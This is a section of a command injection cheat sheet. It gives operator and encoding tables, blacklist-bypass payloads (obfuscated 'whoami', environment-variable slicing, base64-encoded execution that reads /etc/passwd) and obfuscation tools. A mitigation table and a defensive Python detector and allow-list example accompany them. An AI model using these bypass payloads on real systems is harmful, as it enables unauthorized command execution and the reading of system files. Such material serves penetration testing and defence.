3. Command Injection
| Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
|---|---|---|---|
| Semicolon | ; | %3b | Executes both commands sequentially |
| New Line | \n | %0a | Executes both commands sequentially |
| Background | & | %26 | Executes both commands; second may run first |
| Pipe | \| | %7c | Pipes output of first command to second |
| AND | && | %26%26 | Executes second command if first succeeds |
| OR | \|\| | %7c%7c | Executes second command if first fails |
| Sub-Shell | `` | %60%60 | Executes command within a sub-shell (Linux) |
| Sub-Shell | $() | %24%28%29 | Executes command within a sub-shell (Linux) |
| Tab | \t | %09 | Substitutes for a space; brace expansion, e.g. {ls,-la}, also avoids spaces (Linux) |

| Injection Type | Operators |
|---|---|
| SQL Injection | ' , ; -- /* */ |
| Command Injection | ; && |
| LDAP Injection | * ( ) & |
| XPath Injection | ' or and not substring concat count |
| OS Command Injection | ; & |
| Code Injection | ' ; -- /* */ $() ${} #{} %{} ^ |
| Directory Traversal/File Path Traversal | ../ ..\ %00 |
| Object Injection | ; & |
| XQuery Injection | ' ; -- /* */ |
| Shellcode Injection | \x \u %u %n |
| Header Injection | \n \r\n \t %0d %0a %09 |

| Bypassing Blacklisted Characters | Linux | Windows |
|---|---|---|
| Obfuscation | w'h'o'am'i, who$@ami | who^ami |
| Reverse Execution | (tr "[A-Z]" "[a-z]"<<<"WhOaMi") | "whoami"[-1..-6] -join '' |
| Environment Variables | printenv<br>$ echo ${PATH}<br>/usr/local/bin:/usr/bin:/bin:/usr/games<br><br>$ echo ${PATH:0:1}<br>/<br><br>$ echo ${LS_COLORS:10:1}<br>; | Get-ChildItem Env<br>echo %HOMEPATH:~6,-11%<br><br>$env:HOMEPATH[0]<br><br>$env:PROGRAMFILES[10] |
| Encoding | $ echo -n 'cat /etc/passwd \| grep 33' \| base64<br>Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==<br>$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)<br>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | > [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))<br>dwBoAG8AYQBtAGkA<br><br>$ echo -n whoami \| iconv -f utf-8 -t utf-16le \| base64<br>dwBoAG8AYQBtAGkA<br><br>> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"<br>21y4d |

| Mitigation Strategies | Implementation |
|---|---|
| Input Validation | Allow only expected characters and formats |
| Use Safe APIs | Avoid system(), use parameterized queries |
| Least Privilege | Ensure applications run with minimal necessary privileges |
| Regular Security Testing | Conduct automated scanning and manual penetration testing |
| Stay Updated | Keep software and dependencies up to date |
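
Added example (not part of the original cheat sheet) putting the Input Validation and Use Safe APIs rows into Python: it URL-decodes a request parameter and reports which operators from the first table it contains, and it allow-lists a host value before building an argv list so that no shell ever parses the input. The operator naming, the host regex and the ping use case are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote

# Operator table from the cheat sheet, keyed by the URL-decoded token.
# Two-character operators come first so "&&" is reported as AND rather
# than as two Background operators.
OPERATORS = [
    ("AND", "&&"), ("OR", "||"), ("Sub-Shell $()", "$("),
    ("Semicolon", ";"), ("New Line", "\n"), ("Background", "&"),
    ("Pipe", "|"), ("Sub-Shell ``", "`"), ("Tab", "\t"), ("Brace", "{"),
]

# Allow-list for what this parameter should carry (assumed use case): an
# IPv4 address or DNS hostname, RFC 1123 labels, 63 chars each, 253 total.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def detect_operators(raw: str) -> list[str]:
    """Names of cheat-sheet operators present in a request parameter.

    The value is URL-decoded twice so that double encoding (%253b -> %3b
    -> ;) is seen the way the application eventually sees it.
    """
    rest = unquote(unquote(raw))
    found = []
    for name, token in OPERATORS:
        if token in rest:
            found.append(name)
            rest = rest.replace(token, "")  # consume so "&&" is not also "&"
    return found


def build_ping_command(host: str) -> list[str]:
    """Allow-list the host and return an argv list for subprocess.run().

    A list passed with shell=False never reaches /bin/sh, so none of the
    operators above can change the command structure; the allow-list still
    rejects them so the request can be logged instead of failing silently.
    """
    decoded = unquote(host)
    if not HOST_RE.match(decoded):
        raise ValueError(f"rejected host parameter: {decoded!r}")
    return ["ping", "-c", "1", decoded]
```

Run `detect_operators` over constructed values such as `127.0.0.1%3bwhoami` to see the operator names reported, and pass the result of `build_ping_command` straight to `subprocess.run` without `shell=True`.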

| Evasion Tools | Linux | Windows |
|---|---|---|
| Tool | Bashfuscator | Invoke-DOSfuscation |
| Clone Command | git clone https://github.com/Bashfuscator/Bashfuscator | git clone https://github.com/danielbohannon/Invoke-DOSfuscation |
| Execution | ./bashfuscator -c 'cat /etc/passwd' | Import-Module .\Invoke-DOSfuscation.psd1 |